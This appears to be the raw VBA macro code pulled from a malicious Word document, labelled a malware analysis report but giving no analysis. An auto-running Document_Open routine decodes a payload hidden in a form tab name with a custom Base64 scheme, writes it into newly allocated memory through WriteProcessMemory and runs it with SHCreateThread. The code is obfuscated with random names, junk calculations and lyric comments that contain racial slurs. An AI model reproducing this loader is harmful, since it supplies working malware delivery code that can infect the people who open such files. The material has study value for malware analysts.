Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function reestablishment(petrifying, lickspittle, amalgamated)
#If Win64 Then
Dim divestment As String
Dim carduelis As String
Dim dastardness As LongPtr
Dim opprobrium As LongPtr
Dim gnaphalium As LongPtr
Dim choreography As Integer
Dim annexational As LongPtr
Dim overbearingly As LongPtr
#Else
Dim opprobrium As Long
Dim doings As Long
Dim dastardness As Long
Dim audile As Variant
Dim annexational As Long
Dim launderette As Long
Dim gnaphalium As Long
Dim filial As Long
Dim overbearingly As Long
Dim italianspeaking As Integer
Dim irately As Variant
#End If
jinghpo = "adonis"
pyrrosia = Round(299.1033 + 114.788)
opprobrium = petrifying
overbearingly = amalgamated
pyrrosia = Fix(109.174 + 183.1496)
annexational = lickspittle
wonderland = 46
hyacinth = 15930
actinomycete = 549158
officio = SLN(actinomycete, hyacinth, wonderland)

pyrrosia = particles * 4
dastardness = 12 - 61 + 48
dingo ByVal dastardness, opprobrium, annexational, overbearingly, gnaphalium
archebiosis = "flamecolored"
End Function
Sub cando()
Dim proudcrested As Byte
Dim archaism As Byte
Set odocoileus = gregarious.centropomus.Tabs
For Each workings In odocoileus
dracaena = 15
duralumin = 39370
pholiota = 166497
customfall = SLN(pholiota, duralumin, dracaena)

If workings.Index = 9 Then
abysm = "piquancy"
sikes = "abbacy"
consuetudinary = "santolina"
deckle = workings.Name
End If
Next
asset = 112 - 22 + 91 + 7279
brigadier = Right(deckle, asset)
grating = presumable.deliberando(brigadier)
decay = 41
monarchist = 15742
bubaline = 313287
accretionary = SLN(bubaline, monarchist, decay)

herpes = "measuring"
amigos = "cabined"
#If Win64 Then
Dim barbarea As Integer
Dim ingot As LongPtr
Dim dram As LongPtr
Dim ascensional As Long
#Else
Dim dogma As Integer
Dim dram As Long
Dim cryometer As String
Dim ingot As Long
#End If
amphiuma = 64 - 112 - 20 + 68
cephalochordate = "unhomogenized"
counteous = 4096
attentiveness = 41
stubborn = 18243
areal = 431085
greenside = SLN(areal, stubborn, attentiveness)

pretiosa = "agouti"
schizophrenia = "clannishness"
sumptuary = "accomplishable"
ararat = "ga" & "s"
conscious = 77
familiar = 14393
aquifer = 558786
familiar = PV(0.0577, conscious, -9190, aquifer, 1)

belle = grating
bemused = "sch" & "lockmeister"
nymph = "asylum"
ingot = eldership(belle)
ba = "nymphalis"
ganger = "perflation"
#If Win64 Then
Dim bellis As Variant
Dim obolus As LongPtr
arrhenatherum = "doquet"
shoveling = "po" & "ssible"
fireball = "renewed"
Dim ab As LongPtr
casket = 82 + 77 + 1121
#ElseIf Win32 Then
peek = "pleurocarpous"
costate = "phallaceae"
catbird = "fire"
Dim obolus As Long
tabasco = 75 + 439
Dim ab As Long
casket = tabasco + 3204

#End If
Dim tantalite As String
Dim captain As Byte
obolus = 5 - 5
dram = ingot + casket
ab = 1
morphophonemic = artifacts(dram, obolus, ab, obolus)
referee = 26
audiogram = 22280
demoniacally = 450556
adalia = SLN(demoniacally, audiogram, referee)

End Sub

Sub zoom()
    With Documents("Sample.doc").Windows(1).View
        .Type = wdPrintView
        With .zoom
            .PageColumns = 3
            .PageRows = 2
        End With
    End With
End Sub


Function eldership(stuffed)
Dim plated As Long
Dim adorable As Variant
Dim anomie As Variant
Dim uppers As Byte
#If Win64 Then
Dim excursus As Long
Dim eggplant As LongPtr
disequilibrium = 8
Dim electrolyte As Long
Dim camelina As LongPtr
Dim camembert As Integer
Dim crucible As LongPtr
Dim daimyo As Variant
#Else
Dim typographical As Variant
Dim eggplant As Long
disequilibrium = 4
Dim camelina As Long
Dim teddy As Long
Dim crucible As Long
Dim belemnitidae As Variant
Dim houseplant As Variant
#End If
vivre = reestablishment(VarPtr(eggplant), VarPtr(stuffed) + 8, disequilibrium)
alexandrite = 20 + 92 - 113
camelina = 65 + 17 - 82
blarina = 0
crucible = 76 + 111 + 9539
aide = 34 + 4062
amphipod = 64
affaire = deconsecrated(ByVal alexandrite, camelina, ByVal blarina, crucible, ByVal aide, ByVal amphipod)
pyrrosia = pyrrosia + 161

jinghpo = "bulwark"

reestablishment camelina, eggplant, 5594
blepharitis = 66
ironclad = 13067
bitis = 204980
ironclad = PV(0.074, blepharitis, -4517, bitis, 1)

eldership = camelina
End Function
Private Sub Document_Open()
Dim barbuda As Integer
Dim chequers As Byte
noctua = "au" & "ricu" & "late"
soundless = "marc"
cando
marowbones = 109
knock = 15622
unconventional = 336282
knock = PV(0.0321, marowbones, -2683, unconventional, 1)
End Sub

Attribute VB_Name = "presumable"
' You will hear it in the street or you can read it in the press
' I don't eat sushi, I'm the shit, no I'm pollution, no substitution
' Then I'm gonna murder every thing and anything a badaboom a badabing
#If Win64 Then
' I'm out of my head, bitch I'm outta my mind, from the bottom I climb
' I ain't got no time to shuck and jive, these niggas as sweet as pumpkin pie
' And we always gotta do it take it to another place
Public Declare PtrSafe Function closest Lib "Kernel32.dll" Alias "LocalFree" (deuteron As LongPtr) As LongPtr
' And niggas know that I'm the best when it come to doing this
' But since we talking about my dick
' Hell, Breezy
Public Declare PtrSafe Function deconsecrated Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (lighthanded As LongPtr, diminutive As LongPtr, ByVal beneficially As LongPtr,tessellationByVal As LongPtr, balsamic As LongPtr, ByVal jacquinia As LongPtr) As LongPtr
' Yeah, fresher than a motherfucker
' Every time I come a nigga gotta set it, then I gotta go, and then I gotta get it
' Let me show you how to keep the dice rolling
Public Declare PtrSafe Function ramekin Lib "Shell32.dll" Alias "SHValidateUNC" (actitis As LongPtr, coadjutancy As Any,upstream As LongPtr) As Boolean
' Just to be at the top of the throne
' And I come to give you more and I will never give you less
' Let's go!
Public Declare PtrSafe Function constriction Lib "Shell32.dll" Alias "SHGetDesktopFolder" (wart As LongPtr)
' Just to be at the top of the throne
' And I come to give you more and I will never give you less
' Let's go!
Public Declare PtrSafe Function artifacts Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal mat As LongPtr, ByVal guyana As Any, ByVal carbonization As LongPtr, ByVal sexed As LongPtr) As LongPtr
' Just to be at the top of the throne
' And I come to give you more and I will never give you less
' Let's go!
Public Declare PtrSafe Function cdeception Lib "Shell32.dll" Alias "SHGetSettings" (gin As LongPtr,arched As LongPtr) As LongPtr
' Just to be at the top of the throne
' And I come to give you more and I will never give you less
' Let's go!
Public Declare PtrSafe Function dingo Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal analyst As Any, ByVal apiarist As Any, ByVal deprivation As Any, ByVal armenia As Any, ByVal enchanter As Any) As LongPtr
' Just to be at the top of the throne
' And I come to give you more and I will never give you less
' Let's go!
Public Declare PtrSafe Function assoil Lib "Kernel32.dll" Alias "SetSystemTime" (annex As LongPtr) As Boolean
' Just to be at the top of the throne
' And I come to give you more and I will never give you less
' Let's go!

' Cause you know I gotta win everyday, day
' Then I'm gonna murder every thing and anything a badaboom a badabing
' Yellow top missing
#Else
' You ain't never gonna stop me
' Cause I'm killing every nigga that come try to be on my shit
' Dress like a skater, got a big house, came with an elevator
Public Declare Function cheeker Lib "Shell32.dll" Alias "SHGetSettings" (nativist As Long, phalacrocoracidae As Long) As Long
' Look at me now, look at me now
' Look at me now, look at me now
' You will hear it in the street or you can read it in the press
Public Declare Function verbs Lib "Kernel32.dll" Alias "SetSystemTime" (punctiliousness As Long) As Boolean
' Oh, look at me now
' Just know that you will never flop me
' And I be doing it to death and now I move a little foul
Public Declare Function artifacts Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal neofiber As Long, ByVal dissoluteness As Any, ByVal conto As Any, ByVal adige As Any) As Long
' Let's go!
' I never gave a fuck about a hater, got money on my radar
' Cause it doesn't matter, 'cause I'm gonna dadadada
Public Declare Function dingo Lib "Kernel32.dll" Alias "WriteProcessMemory" (ByVal agamidae As Any, ByVal polyergus As Any, ByVal abidjan As Any, ByVal athanasian As Any, ByVal aleurites As Any) As Long
' I never gave a fuck about a hater, got money on my radar
' And I be doing it to death and now I move a little foul
' When you're doing that thing over there homie
Public Declare Function lightduty Lib "Shell32.dll" Alias "SHGetDesktopFolder" (bilingually As Long)
' Oh, I'm getting paper
' A nigga better call a ref, and everybody knows my style
' And I know that I can be a little cocky
Public Declare Function deconsecrated Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (noodlehead As Long, disputes As Long, ByVal crocodylidae As Long, shoeboxByVal As Long, agitative As Long, ByVal outshine As Long) As Long
' And we struggle and I hustle and I set it and I get it
' Bitch I've been tight since "Guiding light",
' Oh, look at me now
Public Declare Function humectate Lib "Kernel32.dll" Alias "LocalFree" (arnoseris As Long) As Long
' And we struggle and I hustle and I set it and I get it
' Bitch I've been tight since "Guiding light",
' Oh, look at me now
Public Declare Function munchil Lib "Shell32.dll" Alias "SHValidateUNC" (chipmunk As Long, hearer As Any, adjuration As Long) As Boolean
' And we struggle and I hustle and I set it and I get it
' Bitch I've been tight since "Guiding light",
' Oh, look at me now

' And we struggle and I hustle and I set it and I get it
' Bitch I've been tight since "Guiding light",
' Oh, look at me now
#End If
' And we struggle and I hustle and I set it and I get it
' Bitch I've been tight since "Guiding light",
' Oh, look at me now
Function compurgation()
Dim sloganeer(255) As Byte
bison = 65
Do
sloganeer(bison) = bison - 65
bison = bison + 1
Loop Until bison = 91
bison = 48
Do
sloganeer(bison) = bison + 4
bison = bison + 1
Loop Until bison = 58
bison = 97
Do
sloganeer(bison) = bison - 71
bison = bison + 1
Loop Until bison = 123
sloganeer(47) = 63
bison = 43
sloganeer(bison) = 62
compurgation = sloganeer
End Function
Sub SelectSentence()
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    
    Set wdApp = GetObject(, "Word.Application")
    
    With wdApp.ActiveDocument
        If .Paragraphs.Count >= 3 Then
            Set wdRng = .Paragraphs(3).Range
            wdRng.Copy
        End If
    End With
    Worksheets("Sheet2").PasteSpecial
    Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub


Function anesthesiologist(anasarcous)
anesthesiologist = AscW(anasarcous)
End Function
Function deliberando(apothegmatic) As String
Dim amsterdam As Long
Dim taxicab As Integer

Dim sufficiency As Variant

Dim fibril(63) As Long
Dim milier As Long
Dim neoclassic As Integer
Dim sensualism(63) As Long
Dim substantiate As Long
Dim sarcoma(63) As Long
Dim foretaste() As Byte
Dim rubescence As Variant

particles = Fix(493.925 + 341.493)

pyrrosia = pyrrosia * 3

Dim timidity As String
archebiosis = archebiosis

Dim absorbing(6965) As Byte
Dim reprieval As Long
errantry = 4096
unfed = 64
Dim palmistry As Integer

diceros = 15 - 107 - 18 + 4142
alltime = 258048
hypoxidaceae = 16711680
babyrousa = 65536
Dim fandi As Integer

anaerobe = 16515072
dispiritedly = 78 - 110 + 287
Dim bryophyta As Integer

impatiently = 93 + 46 - 88 + 262093
mnemonics = 79 - 16
pacifist = 65280
bruckenthalia = 98 + 30 + 20 + 108
Dim mortification As String
cabriolet = 0
colpocele = 7459
Dim anchoret() As Byte
anchoret = VBA.StrConv(apothegmatic, vbFromUnicode)
Dim ribes As Integer
stolen = 106
sideral = 11167
afrocarpus = 195947
sideral = PV(0.0508, stolen, -28736, afrocarpus, 1)

bred = 7459
pantropical = 35
conjecture = Log(100) / Log(10) + 11
For tonsils = 0 To bred
anchoret(tonsils) = anchoret(tonsils) + conjecture
Next tonsils
overskirt = 45
safar = 22408
salleamanger = 434946
gothicism = SLN(salleamanger, safar, overskirt)

neoclassic = 0
fatuis = 116 + 63 - 49 - 130
megabyte = 43
charinile = compurgation
For milier = 0 To 63
sarcoma(milier) = abbe(milier, unfed, 3)
fibril(milier) = abbe(milier, errantry, 3)
sensualism(milier) = abbe(milier, impatiently, 3)
Next milier
coffeepot = 30
hereness = 3443
instigator = 500879
hereness = PV(0.0761, coffeepot, -5410, instigator, 1)

foretaste = anchoret
balistes = 4
husbandry = 96
aver = 13304
mart = 475214
aver = PV(0.0583, husbandry, -16055, mart, 1)

sacrament = 103 - 100
pyrrosia = Round(281.1323 + 387.1366)

particles = Int(210.1281 + 117.416)

humming = sacrament + 1
heliosphere = 108 + 70 - 176
For reprieval = 0 To bred
brink = foretaste(reprieval)
anatomic = foretaste(reprieval + 2)
substantiate = sensualism(charinile(brink)) _
 + fibril(charinile(foretaste(reprieval + 1))) + sarcoma(charinile(anatomic)) + charinile(foretaste(reprieval + sacrament))
milier = abbe(substantiate, hypoxidaceae, 2)
absorbing(amsterdam) = abbe(milier, babyrousa, 1)
milier = abbe(substantiate, pacifist, 2)
absorbing(amsterdam + 1) = abbe(milier, bruckenthalia, 1)
absorbing(amsterdam + heliosphere) = abbe(substantiate, dispiritedly, 2)
amsterdam = amsterdam + heliosphere + 1
reprieval = reprieval + 3
Next
deliberando = absorbing
End Function

Function abbe(intradermally, beadyeyed, inertness)
Select Case inertness
Case 1
abbe = intradermally \ beadyeyed
Case 2
abbe = intradermally And beadyeyed
Case 3
abbe = intradermally * beadyeyed
End Select
End Function


Attribute VB_Name = "gregarious"
Attribute VB_Base = "0{01C92DF5-488B-4408-ADF0-65D4B40F2604}{36A8154E-0BAA-4E52-84D3-65DD0604E13E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False